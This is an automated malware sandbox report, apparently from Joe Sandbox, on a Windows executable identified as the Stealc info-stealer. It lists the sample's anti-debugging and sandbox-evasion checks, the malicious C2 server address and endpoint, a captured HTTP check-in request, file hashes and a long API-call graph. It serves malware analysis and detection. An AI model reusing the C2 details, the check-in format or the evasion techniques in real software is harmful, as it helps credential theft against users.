                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
                Source: C:\Users\user\Desktop\file.exe | File opened: SICE
                Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003245C0 VirtualProtect ?,00000004,00000100,00000000 | 0_2_003245C0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00339860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 0_2_00339860
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00339750 mov eax, dword ptr fs:[00000030h] | 0_2_00339750
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00337850 GetProcessHeap,RtlAllocateHeap,GetUserNameA | 0_2_00337850
                Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: Yara match | File source: Process Memory Space: file.exe PID: 6500, type: MEMORYSTR
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00339600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle | 0_2_00339600
                Source: file.exe, file.exe, 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: !Program Manager
                Source: C:\Users\user\Desktop\file.exe | Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree | 0_2_00337B90
                Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00336920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess | 0_2_00336920
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00337850 GetProcessHeap,RtlAllocateHeap,GetUserNameA | 0_2_00337850
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00337A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA | 0_2_00337A30

                Stealing of Sensitive Information

                Source: Yara match | File source: 0.2.file.exe.320000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000000.00000002.1735801152.000000000107E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000003.1694461519.0000000004E80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: file.exe PID: 6500, type: MEMORYSTR
                Source: Yara match | File source: dump.pcap, type: PCAP

                Remote Access Functionality

                Source: Yara match | File source: 0.2.file.exe.320000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000000.00000002.1735801152.000000000107E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000003.1694461519.0000000004E80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: file.exe PID: 6500, type: MEMORYSTR
                Source: Yara match | File source: dump.pcap, type: PCAP
                MITRE ATT&CK matrix (a leading number is the count of matched signatures for that technique):

                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 11 Process Injection | 1 Masquerading | OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                Credentials | Domains | Default Accounts | 11 Native API | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 33 Virtualization/Sandbox Evasion | LSASS Memory | 641 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 2 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
                Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 11 Disable or Modify Tools | Security Account Manager | 33 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 11 Process Injection | NTDS | 13 Process Discovery | Distributed Component Object Model | Input Capture | 12 Application Layer Protocol | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 Account Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 3 Obfuscated Files or Information | Cached Domain Credentials | 1 System Owner/User Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 12 Software Packing | DCSync | 1 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | 324 System Information Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                Source | Detection | Scanner | Label | Link
                file.exe | 100% | Avira | TR/Crypt.TPM.Gen |
                file.exe | 100% | Joe Sandbox ML | |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                Source | Detection | Scanner | Label | Link
                http://185.215.113.37/ | 100% | URL Reputation | malware |
                http://185.215.113.37 | 100% | URL Reputation | malware |
                http://185.215.113.37/e2b1563c6670f193.php | 100% | URL Reputation | malware |
                No contacted domains info
                Name | Malicious | Antivirus Detection | Reputation
                http://185.215.113.37/ | true | URL Reputation: malware | unknown
                http://185.215.113.37/e2b1563c6670f193.php | true | URL Reputation: malware | unknown
                Name | Source | Malicious | Antivirus Detection | Reputation
                http://185.215.113.37/e2b1563c6670f193.php8a | file.exe, 00000000.00000002.1735801152.00000000010D8000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37/e2b1563c6670f193.phpR | file.exe, 00000000.00000002.1735801152.000000000107E000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37/e2b1563c6670f193.php%: | file.exe, 00000000.00000002.1735801152.00000000010C6000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37/e2b1563c6670f193.phpu: | file.exe, 00000000.00000002.1735801152.00000000010C6000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37 | file.exe, 00000000.00000002.1735801152.00000000010D8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1735801152.000000000107E000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
                http://185.215.113.37/law | file.exe, 00000000.00000002.1735801152.00000000010D8000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37W$ | file.exe, 00000000.00000002.1735801152.000000000107E000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                185.215.113.37 | unknown | Portugal | | 206894 | WHOLESALECONNECTIONSNL | true
                Joe Sandbox version: 41.0.0 Charoite
                Analysis ID: 1532751
                Start date and time: 2024-10-13 21:39:10 +02:00
                Joe Sandbox product: CloudBasic
                Overall analysis duration: 0h 3m 1s
                Hypervisor based Inspection enabled: false
                Report type: full
                Cookbook file name: default.jbs
                Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed: 1
                Number of new started drivers analysed: 0
                Number of existing processes analysed: 0
                Number of existing drivers analysed: 0
                Number of injected processes analysed: 0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode: default
                Analysis stop reason: Timeout
                Sample name: file.exe
                Detection: MAL
                Classification: mal100.troj.evad.winEXE@1/0@0/1
                EGA Information:
                • Successful, ratio: 100%
                HCA Information:
                • Successful, ratio: 81%
                • Number of executed functions: 19
                • Number of non-executed functions: 82
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Stop behavior analysis, all processes terminated
                • Report size getting too big, too many NtQueryValueKey calls found.
                • VT rate limit hit for: file.exe
                No simulations
Match: 185.215.113.37 (IP)
Associated sample: file.exe; Detection: malicious; Threat Name: Stealc; Context: 185.215.113.37/e2b1563c6670f193.php
Associated sample: file.exe; Detection: malicious; Threat Name: Stealc, Vidar; Context: 185.215.113.37/e2b1563c6670f193.php
Associated sample: file.exe; Detection: malicious; Threat Name: Stealc; Context: 185.215.113.37/e2b1563c6670f193.php
Associated sample: file.exe; Detection: malicious; Threat Name: Stealc, Vidar; Context: 185.215.113.37/e2b1563c6670f193.php
Associated sample: file.exe; Detection: malicious; Threat Name: Stealc; Context: 185.215.113.37/e2b1563c6670f193.php
Associated sample: file.exe; Detection: malicious; Threat Name: Stealc; Context: 185.215.113.37/e2b1563c6670f193.php
Associated sample: file.exe; Detection: malicious; Threat Name: Stealc, Vidar; Context: 185.215.113.37/e2b1563c6670f193.php
Associated sample: file.exe; Detection: malicious; Threat Name: Stealc; Context: 185.215.113.37/e2b1563c6670f193.php
Associated sample: file.exe; Detection: malicious; Threat Name: Stealc; Context: 185.215.113.37/e2b1563c6670f193.php
Associated sample: file.exe; Detection: malicious; Threat Name: Stealc, Vidar; Context: 185.215.113.37/e2b1563c6670f193.php
                            No context
Match: WHOLESALECONNECTIONSNL (ASN)
Associated sample: file.exe; Detection: malicious; Threat Name: Stealc; Context: 185.215.113.37
Associated sample: file.exe; Detection: malicious; Threat Name: Stealc, Vidar; Context: 185.215.113.37
Associated sample: file.exe; Detection: malicious; Threat Name: Stealc; Context: 185.215.113.37
Associated sample: file.exe; Detection: malicious; Threat Name: Stealc, Vidar; Context: 185.215.113.37
Associated sample: file.exe; Detection: malicious; Threat Name: Stealc; Context: 185.215.113.37
Associated sample: file.exe; Detection: malicious; Threat Name: Stealc; Context: 185.215.113.37
Associated sample: file.exe; Detection: malicious; Threat Name: Stealc, Vidar; Context: 185.215.113.37
Associated sample: file.exe; Detection: malicious; Threat Name: Stealc; Context: 185.215.113.37
Associated sample: file.exe; Detection: malicious; Threat Name: Stealc; Context: 185.215.113.37
Associated sample: file.exe; Detection: malicious; Threat Name: Stealc, Vidar; Context: 185.215.113.37
                            No context
                            No context
                            No created / dropped files found
                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):7.948654946980613
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.96%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:file.exe
                            File size:1'815'040 bytes
                            MD5:9c8851494e85a86a1b823868d2ec5b1b
                            SHA1:dbf8f81d9c9bfb1ae8ad0cd1d5bad9a6d0dd41c5
                            SHA256:3a69f6d29dee1aec39e1a81e574b7dcebe2e3ee08f2d36117a2bc19d8e279e14
                            SHA512:9a3927d3fc6fc8f7d59041b8d4dd5d5b3740e71fb07a28d109d44bb16c84deb53b015f162795289322180e2151370acc596b5eb14c5071df494ec8a0f4fa28b3
                            SSDEEP:49152:pKQM2W0k94KIOxqeqnEh62hU2d3XW/AJDH:pSUflsqEhvU1/Wr
                            TLSH:998533302877E23DC93D0E342686A78A96BCC3599C137F19785B7E5A10D70A821B9DDF
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........
                            Icon Hash:90cececece8e8eb0
                            Entrypoint:0xa87000
                            Entrypoint Section:.taggant
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                            Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:5
                            OS Version Minor:1
                            File Version Major:5
                            File Version Minor:1
                            Subsystem Version Major:5
                            Subsystem Version Minor:1
                            Import Hash:2eabe9054cad5152567f0699947a2c5b
                            Instruction
                            Programming Language:
                            • [C++] VS2010 build 30319
                            • [ASM] VS2010 build 30319
                            • [ C ] VS2010 build 30319
                            • [ C ] VS2008 SP1 build 30729
                            • [IMP] VS2008 SP1 build 30729
                            • [LNK] VS2010 build 30319
IMAGE_DIRECTORY_ENTRY_EXPORT: Virtual Address 0x0; Virtual Size 0x0
IMAGE_DIRECTORY_ENTRY_IMPORT: Virtual Address 0x25d050; Virtual Size 0x64; Is in Section .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE: Virtual Address 0x0; Virtual Size 0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION: Virtual Address 0x0; Virtual Size 0x0
IMAGE_DIRECTORY_ENTRY_SECURITY: Virtual Address 0x0; Virtual Size 0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC: Virtual Address 0x25d1f8; Virtual Size 0x8; Is in Section .idata
IMAGE_DIRECTORY_ENTRY_DEBUG: Virtual Address 0x0; Virtual Size 0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT: Virtual Address 0x0; Virtual Size 0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR: Virtual Address 0x0; Virtual Size 0x0
IMAGE_DIRECTORY_ENTRY_TLS: Virtual Address 0x0; Virtual Size 0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG: Virtual Address 0x0; Virtual Size 0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT: Virtual Address 0x0; Virtual Size 0x0
IMAGE_DIRECTORY_ENTRY_IAT: Virtual Address 0x0; Virtual Size 0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT: Virtual Address 0x0; Virtual Size 0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR: Virtual Address 0x0; Virtual Size 0x0
IMAGE_DIRECTORY_ENTRY_RESERVED: Virtual Address 0x0; Virtual Size 0x0
Name: (empty); Virtual Address: 0x1000; Virtual Size: 0x25b000; Raw Size: 0x22800; MD5: e339f1f39e3e6e1e7458bf9148d06baa; Xored PE: unknown; ZLIB Complexity: unknown; File Type: unknown; Entropy: unknown; Characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name: .rsrc; Virtual Address: 0x25c000; Virtual Size: 0x1000; Raw Size: 0x0; MD5: d41d8cd98f00b204e9800998ecf8427e; Xored PE: False; ZLIB Complexity: 0; File Type: empty; Entropy: 0.0; Characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name: .idata; Virtual Address: 0x25d000; Virtual Size: 0x1000; Raw Size: 0x200; MD5: c60c4959cc8d384ac402730cc6842bb0; Xored PE: False; ZLIB Complexity: 0.1328125; File Type: data; Entropy: 0.9064079259880791; Characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name: (empty); Virtual Address: 0x25e000; Virtual Size: 0x293000; Raw Size: 0x200; MD5: 94bcc77104458130dc55e50ec24443bf; Xored PE: unknown; ZLIB Complexity: unknown; File Type: unknown; Entropy: unknown; Characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name: mmvujlrd; Virtual Address: 0x4f1000; Virtual Size: 0x195000; Raw Size: 0x195000; MD5: 73b6fae786ceffb1e52af6da1d7eae24; Xored PE: False; ZLIB Complexity: 0.9949291087962963; File Type: data; Entropy: 7.953824912705421; Characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name: youucsdu; Virtual Address: 0x686000; Virtual Size: 0x1000; Raw Size: 0x400; MD5: 1cb22b464560e6f2eb9658b8845b0a8b; Xored PE: False; ZLIB Complexity: 0.7998046875; File Type: data; Entropy: 6.112458813829965; Characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name: .taggant; Virtual Address: 0x687000; Virtual Size: 0x3000; Raw Size: 0x2200; MD5: ecde58828f1aed1d3adcb89adbb688d9; Xored PE: False; ZLIB Complexity: 0.06410845588235294; File Type: DOS executable (COM); Entropy: 0.7510811429342507; Characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
DLL: kernel32.dll; Import: lstrcpy
Timestamp: 2024-10-13T21:40:06.485545+0200; SID: 2044243; Signature: ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in; Severity: 1; Source IP: 192.168.2.4; Source Port: 49730; Dest IP: 185.215.113.37; Dest Port: 80; Protocol: TCP
Timestamp; Source Port -> Dest Port; Source IP -> Dest IP
Oct 13, 2024 21:40:05.529895067 CEST; 49730 -> 80; 192.168.2.4 -> 185.215.113.37
Oct 13, 2024 21:40:05.535093069 CEST; 80 -> 49730; 185.215.113.37 -> 192.168.2.4
Oct 13, 2024 21:40:05.535196066 CEST; 49730 -> 80; 192.168.2.4 -> 185.215.113.37
Oct 13, 2024 21:40:05.535751104 CEST; 49730 -> 80; 192.168.2.4 -> 185.215.113.37
Oct 13, 2024 21:40:05.540678978 CEST; 80 -> 49730; 185.215.113.37 -> 192.168.2.4
Oct 13, 2024 21:40:06.247569084 CEST; 80 -> 49730; 185.215.113.37 -> 192.168.2.4
Oct 13, 2024 21:40:06.247654915 CEST; 49730 -> 80; 192.168.2.4 -> 185.215.113.37
Oct 13, 2024 21:40:06.249881029 CEST; 49730 -> 80; 192.168.2.4 -> 185.215.113.37
Oct 13, 2024 21:40:06.254956007 CEST; 80 -> 49730; 185.215.113.37 -> 192.168.2.4
Oct 13, 2024 21:40:06.485419989 CEST; 80 -> 49730; 185.215.113.37 -> 192.168.2.4
Oct 13, 2024 21:40:06.485544920 CEST; 49730 -> 80; 192.168.2.4 -> 185.215.113.37
Oct 13, 2024 21:40:10.176556110 CEST; 49730 -> 80; 192.168.2.4 -> 185.215.113.37
HTTP session with 185.215.113.37
Session ID: 0; Source IP: 192.168.2.4; Source Port: 49730; Destination IP: 185.215.113.37; Destination Port: 80; PID: 6500; Process: C:\Users\user\Desktop\file.exe
Timestamp; Bytes transferred; Direction; Data
Oct 13, 2024 21:40:05.535751104 CEST; 89; OUT
GET / HTTP/1.1
Host: 185.215.113.37
Connection: Keep-Alive
Cache-Control: no-cache
Oct 13, 2024 21:40:06.247569084 CEST; 203; IN
HTTP/1.1 200 OK
Date: Sun, 13 Oct 2024 19:40:06 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Oct 13, 2024 21:40:06.249881029 CEST; 412; OUT
POST /e2b1563c6670f193.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----CAAAFCAKKKFBFIDGDBFH
Host: 185.215.113.37
Content-Length: 211
Connection: Keep-Alive
Cache-Control: no-cache
Data Ascii:
------CAAAFCAKKKFBFIDGDBFH
Content-Disposition: form-data; name="hwid"

8C28866889272029741119
------CAAAFCAKKKFBFIDGDBFH
Content-Disposition: form-data; name="build"

doma
------CAAAFCAKKKFBFIDGDBFH--
Oct 13, 2024 21:40:06.485419989 CEST; 210; IN
HTTP/1.1 200 OK
                            Date: Sun, 13 Oct 2024 19:40:06 GMT
                            Server: Apache/2.4.52 (Ubuntu)
                            Content-Length: 8
                            Keep-Alive: timeout=5, max=99
                            Connection: Keep-Alive
                            Content-Type: text/html; charset=UTF-8
                            Data Raw: 59 6d 78 76 59 32 73 3d
Data Ascii: YmxvY2s= (base64 for "block")



                            Target ID:0
                            Start time:15:40:03
                            Start date:13/10/2024
                            Path:C:\Users\user\Desktop\file.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\file.exe"
                            Imagebase:0x320000
                            File size:1'815'040 bytes
                            MD5 hash:9C8851494E85A86A1B823868D2EC5B1B
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1735801152.000000000107E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1694461519.0000000004E80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                            Reputation:low
                            Has exited:true


                              Execution Graph

                              Execution Coverage:8.4%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:9.7%
                              Total number of Nodes:2000
                              Total number of Limit Nodes:24
API calls 13705->13706 13707 322ca9 13706->13707 13708 3245c0 2 API calls 13707->13708 13709 322cc2 13708->13709 13710 3245c0 2 API calls 13709->13710 13711 322cdb 13710->13711 13712 3245c0 2 API calls 13711->13712 13713 322cf4 13712->13713 13714 3245c0 2 API calls 13713->13714 13715 322d0d 13714->13715 13716 3245c0 2 API calls 13715->13716 13717 322d26 13716->13717 13718 3245c0 2 API calls 13717->13718 13719 322d3f 13718->13719 13720 3245c0 2 API calls 13719->13720 13721 322d58 13720->13721 13722 3245c0 2 API calls 13721->13722 13723 322d71 13722->13723 13724 3245c0 2 API calls 13723->13724 13725 322d8a 13724->13725 13726 3245c0 2 API calls 13725->13726 13727 322da3 13726->13727 13728 3245c0 2 API calls 13727->13728 13729 322dbc 13728->13729 13730 3245c0 2 API calls 13729->13730 13731 322dd5 13730->13731 13732 3245c0 2 API calls 13731->13732 13733 322dee 13732->13733 13734 3245c0 2 API calls 13733->13734 13735 322e07 13734->13735 13736 3245c0 2 API calls 13735->13736 13737 322e20 13736->13737 13738 3245c0 2 API calls 13737->13738 13739 322e39 13738->13739 13740 3245c0 2 API calls 13739->13740 13741 322e52 13740->13741 13742 3245c0 2 API calls 13741->13742 13743 322e6b 13742->13743 13744 3245c0 2 API calls 13743->13744 13745 322e84 13744->13745 13746 3245c0 2 API calls 13745->13746 13747 322e9d 13746->13747 13748 3245c0 2 API calls 13747->13748 13749 322eb6 13748->13749 13750 3245c0 2 API calls 13749->13750 13751 322ecf 13750->13751 13752 3245c0 2 API calls 13751->13752 13753 322ee8 13752->13753 13754 3245c0 2 API calls 13753->13754 13755 322f01 13754->13755 13756 3245c0 2 API calls 13755->13756 13757 322f1a 13756->13757 13758 3245c0 2 API calls 13757->13758 13759 322f33 13758->13759 13760 3245c0 2 API calls 13759->13760 13761 322f4c 13760->13761 13762 3245c0 2 API calls 13761->13762 13763 322f65 13762->13763 13764 3245c0 2 API calls 13763->13764 13765 322f7e 13764->13765 13766 3245c0 2 API calls 13765->13766 13767 322f97 13766->13767 13768 3245c0 2 API calls 
13767->13768 13769 322fb0 13768->13769 13770 3245c0 2 API calls 13769->13770 13771 322fc9 13770->13771 13772 3245c0 2 API calls 13771->13772 13773 322fe2 13772->13773 13774 3245c0 2 API calls 13773->13774 13775 322ffb 13774->13775 13776 3245c0 2 API calls 13775->13776 13777 323014 13776->13777 13778 3245c0 2 API calls 13777->13778 13779 32302d 13778->13779 13780 3245c0 2 API calls 13779->13780 13781 323046 13780->13781 13782 3245c0 2 API calls 13781->13782 13783 32305f 13782->13783 13784 3245c0 2 API calls 13783->13784 13785 323078 13784->13785 13786 3245c0 2 API calls 13785->13786 13787 323091 13786->13787 13788 3245c0 2 API calls 13787->13788 13789 3230aa 13788->13789 13790 3245c0 2 API calls 13789->13790 13791 3230c3 13790->13791 13792 3245c0 2 API calls 13791->13792 13793 3230dc 13792->13793 13794 3245c0 2 API calls 13793->13794 13795 3230f5 13794->13795 13796 3245c0 2 API calls 13795->13796 13797 32310e 13796->13797 13798 3245c0 2 API calls 13797->13798 13799 323127 13798->13799 13800 3245c0 2 API calls 13799->13800 13801 323140 13800->13801 13802 3245c0 2 API calls 13801->13802 13803 323159 13802->13803 13804 3245c0 2 API calls 13803->13804 13805 323172 13804->13805 13806 3245c0 2 API calls 13805->13806 13807 32318b 13806->13807 13808 3245c0 2 API calls 13807->13808 13809 3231a4 13808->13809 13810 3245c0 2 API calls 13809->13810 13811 3231bd 13810->13811 13812 3245c0 2 API calls 13811->13812 13813 3231d6 13812->13813 13814 3245c0 2 API calls 13813->13814 13815 3231ef 13814->13815 13816 3245c0 2 API calls 13815->13816 13817 323208 13816->13817 13818 3245c0 2 API calls 13817->13818 13819 323221 13818->13819 13820 3245c0 2 API calls 13819->13820 13821 32323a 13820->13821 13822 3245c0 2 API calls 13821->13822 13823 323253 13822->13823 13824 3245c0 2 API calls 13823->13824 13825 32326c 13824->13825 13826 3245c0 2 API calls 13825->13826 13827 323285 13826->13827 13828 3245c0 2 API calls 13827->13828 13829 32329e 13828->13829 13830 3245c0 2 API calls 13829->13830 
13831 3232b7 13830->13831 13832 3245c0 2 API calls 13831->13832 13833 3232d0 13832->13833 13834 3245c0 2 API calls 13833->13834 13835 3232e9 13834->13835 13836 3245c0 2 API calls 13835->13836 13837 323302 13836->13837 13838 3245c0 2 API calls 13837->13838 13839 32331b 13838->13839 13840 3245c0 2 API calls 13839->13840 13841 323334 13840->13841 13842 3245c0 2 API calls 13841->13842 13843 32334d 13842->13843 13844 3245c0 2 API calls 13843->13844 13845 323366 13844->13845 13846 3245c0 2 API calls 13845->13846 13847 32337f 13846->13847 13848 3245c0 2 API calls 13847->13848 13849 323398 13848->13849 13850 3245c0 2 API calls 13849->13850 13851 3233b1 13850->13851 13852 3245c0 2 API calls 13851->13852 13853 3233ca 13852->13853 13854 3245c0 2 API calls 13853->13854 13855 3233e3 13854->13855 13856 3245c0 2 API calls 13855->13856 13857 3233fc 13856->13857 13858 3245c0 2 API calls 13857->13858 13859 323415 13858->13859 13860 3245c0 2 API calls 13859->13860 13861 32342e 13860->13861 13862 3245c0 2 API calls 13861->13862 13863 323447 13862->13863 13864 3245c0 2 API calls 13863->13864 13865 323460 13864->13865 13866 3245c0 2 API calls 13865->13866 13867 323479 13866->13867 13868 3245c0 2 API calls 13867->13868 13869 323492 13868->13869 13870 3245c0 2 API calls 13869->13870 13871 3234ab 13870->13871 13872 3245c0 2 API calls 13871->13872 13873 3234c4 13872->13873 13874 3245c0 2 API calls 13873->13874 13875 3234dd 13874->13875 13876 3245c0 2 API calls 13875->13876 13877 3234f6 13876->13877 13878 3245c0 2 API calls 13877->13878 13879 32350f 13878->13879 13880 3245c0 2 API calls 13879->13880 13881 323528 13880->13881 13882 3245c0 2 API calls 13881->13882 13883 323541 13882->13883 13884 3245c0 2 API calls 13883->13884 13885 32355a 13884->13885 13886 3245c0 2 API calls 13885->13886 13887 323573 13886->13887 13888 3245c0 2 API calls 13887->13888 13889 32358c 13888->13889 13890 3245c0 2 API calls 13889->13890 13891 3235a5 13890->13891 13892 3245c0 2 API calls 13891->13892 13893 3235be 
